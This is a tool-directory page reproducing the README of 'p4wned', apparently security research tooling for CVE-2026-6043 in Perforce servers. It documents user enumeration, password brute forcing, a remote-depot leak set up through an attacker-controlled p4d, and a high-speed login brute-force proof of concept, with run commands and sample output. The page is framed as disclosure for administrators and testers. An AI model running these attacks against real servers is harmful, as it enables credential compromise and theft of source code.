Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
p4wned — Perforce security research and tools - CVE-2026-6043 | Kitploit
Tools/GitHubGitHub/flyingllama87/p4wned
ReconnaissanceVulnerability ScannersWeb Vulnerability ScannersExploit FrameworksPassword AttacksExploitationInformation GatheringPenetration TestingMisconfiguration
GitHubflyingllama87/p4wned

p4wned

Perforce security research and tools - CVE-2026-6043

2153 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
View RepositoryWebsite

P4WNED (CVE-2026-6043)

Perforce (Helix Core) security research tools and nuclei templates.

Research article: https://morganrobertson.net/p4wned/

Please read the above for complete details.

Authorised targets only. Use on your own servers or with explicit written permission.

Intended audience: Perforce server administrators, penetration testers, security engineers

May 2026 Update: Perforce 2026.1 has been released. This version ships with secure defaults! Very pleased to see this released to protect developer IP. Read more here.

Note: These tools scan for the misconfigurations resulting from CVE-2026-6043.


Requirements

ToolRequires
p4wned.pyPython 3, p4 CLI binary (see below)
p4ghost.pyPython 3, p4 CLI binary, local p4d instance (see setup below)
p4-auth-hammerg++, Perforce C++ API, OpenSSL 1.1.1 (see p4-auth-hammer/README.md)
JavaScript toolsNode.js (no external dependencies)
Nuclei templatesNuclei v3+
Metasploit modulesMetasploit Framework

Acquiring the p4 binary (required by p4wned.py and p4ghost.py):

# Subject to Perforce terms of use: https://www.perforce.com/legal
wget https://ftp.perforce.com/perforce/r25.2/bin.linux26x86_64/p4
chmod +x p4

Background

Perforce servers expose a custom binary TCP protocol (default port 1666). Many installations ship with insecure defaults — unauthenticated user listing, server info disclosure, accessible remote depots, no password requirements, and no rate-limiting on login attempts. All tools here exploit these defaults without requiring credentials.


Tools

p4wned.py — Full Security Scanner

The primary scanner. Uses the p4 CLI binary to enumerate users, test credentials, list depots, and produce a report.

python3 p4wned.py [-brute] [-audit] [-parallel N]

Options:

FlagDescription
-bruteEnable brute force mode — tests passwords against all discovered user accounts
-auditThorough audit mode — continues testing all users even after finding a vulnerability
-parallel NNumber of parallel password attempts (default: 1)

Config (edit at top of script):

VariableDescription
INPUT_FILETarget list (ip:port, one per line) — default perforce-servers.txt
P4_CMDPath to p4 binary — default ./p4
TOP_PASSWORDS_FILEWordlist for brute force — default top-passwords.txt
KNOWN_CREDS_FILEKnown credential pairs to try first
REPORT_FILEOutput report path

What it does:

  • Detects ASCII vs unicode server mode
  • Enumerates users (if run.users.authorize=0)
  • Tests for blank passwords and known/common credentials
  • Lists depot names and samples recent file paths
  • Checks for super group membership on compromised accounts
  • Outputs a structured text report

Console output:

$ python3 p4wned.py

                   ___ _  _  __    __    __  __  ___ 
                  / _ \ || |/ / /\ \ \/\ \ \/__\/   \
                 / /_)/ || |\ \/  \/ /  \/ /_\ / /\ /
                / ___/|__   _\  /\  / /\  //__/ /_// 
                \/       |_|  \/  \/\_\ \/\__/___,'  

P4WNED - 0wning P4 servers via shit security defaults since Y2K+25

 · Sniffs out user accounts, blank passwords, weak creds, and dumb settings.
 · Confirms depots access and those juicy "super" user accounts.
 · Drops a tidy report so you can fix the mess before the Skids arrive

Authorised targets only, brotendo. Use on your own servers or at your own risk.
==============================================================================


=== Processing: 192.0.2.10:1666 (perforce.example-studio.com) ===

[INFO] Testing user 'super' for security issues...
[INFO] User 'super' does not exist.

[INFO] Users listing accessible: build, designer1, jsmith, lead_prog, svc_build

[INFO] Testing user 'build' for security issues...
[INFO] Testing user 'designer1' for security issues...
[INFO] Testing user 'jsmith' for security issues...
[INFO] Testing user 'lead_prog' for security issues...
[INFO] Testing user 'svc_build' for security issues...

[INFO] Added new credential for 192.0.2.10:1666: user='svc_build', password='None'
[INFO] Saving updated credentials after finding valid credentials for svc_build on 192.0.2.10:1666

[INFO] Report saved to perforce-report-p4wned-1775436520.txt

Report file (perforce-report-p4wned-*.txt):

Perforce Security Scan Report

Server: 192.0.2.10:1666 (perforce.example-studio.com)
  Status: Insecure
  Note: Insecure via user 'svc_build' (no password)

  == Depots ==
Depot depot 2025/11/03 local depot/... 'Default depot'
Depot assets 2024/08/19 local assets/... 'Asset depot'

  == Last 10 Changes ==
Change 1047 on 2025/11/03 14:22:11 by lead_prog@DESKTOP-BUILD01

        Merge branch feature/ai-pathfinding

Change 1046 on 2025/11/03 09:44:38 by designer1@DESKTOP-ART02

        Updated character rig exports

  == Depot Details ==

  Depot: depot
    -- Root Directories --
    //depot/Source
    //depot/Content
    //depot/Config
    This depot is a non-Unreal Engine Depot.

------------------------------------------------------------

Summary Report

Server: 192.0.2.10:1666 - Insecure - Note: Insecure via user 'svc_build' (no password)

p4ghost.py — Remote Depot Scanner

Tests for unauthenticated remote depot access via the hidden remote user. The exploit works by running an attacker-controlled p4d instance locally — the target server connects back to it as part of the server-to-server protocol, leaking its depot file listing in the process.

Setup (one-time):

# Subject to Perforce terms of use: https://www.perforce.com/legal
wget https://ftp.perforce.com/perforce/r24.2/bin.linux26x86_64/p4d
wget https://ftp.perforce.com/perforce/r25.2/bin.linux26x86_64/p4
chmod +x p4d p4

# Start a plain ASCII p4d on port 1818 (used as the attacker's server)
mkdir p4root_attacker
./p4d -r ./p4root_attacker -p 1818 -d

# Start a unicode p4d on a separate port (1819) for unicode targets
mkdir p4root_attacker_unicode
./p4d -r ./p4root_attacker_unicode -xi   # convert to unicode mode
./p4d -r ./p4root_attacker_unicode -p 1819 -d
python3 p4ghost.py <input_file> [-skipnolicense] [-report FILE] [-p4cmd PATH]
                   [-unicodeport PORT] [-nonunicodeport PORT] [-timeout SECS]
# Example invocation using the local attacker servers above
python3 p4ghost.py targets.txt -nonunicodeport 1818 -unicodeport 1819

Arguments:

FlagDescription
input_fileTarget list (ip:port, one per line)
-skipnolicenseSkip servers that return Server license: none
-report FILEOutput report path
-p4cmd PATHPath to p4 binary (default ./p4)
-unicodeport PORTLocal unicode p4d port to use as attacker's server
-nonunicodeport PORTLocal non-unicode p4d port
-timeout SECSCommand timeout

Affected versions: All versions below 2025.1 with security < 4 (default is 0).


p4-auth-hammer — Brute Force PoC (C++)

Proof-of-concept demonstrating that p4d does not effectively rate-limit authentication attempts when security < 3. Achieves >300,000 login attempts per minute against a single account using the Perforce C++ API.

./p4_auth_hammer_poc <server:port> <username> <password_file> [-ticketauth]

Build (requires Perforce C++ API and OpenSSL 1.1.1 — see p4-auth-hammer/README.md for full setup):

Download Tool